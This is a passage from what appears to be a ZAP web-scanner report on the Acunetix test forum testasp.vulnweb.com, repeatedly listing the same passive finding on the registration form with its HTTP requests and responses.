name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=56 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=57 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=58 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=59 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=60 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=61 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=62 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62" class="menu">logout 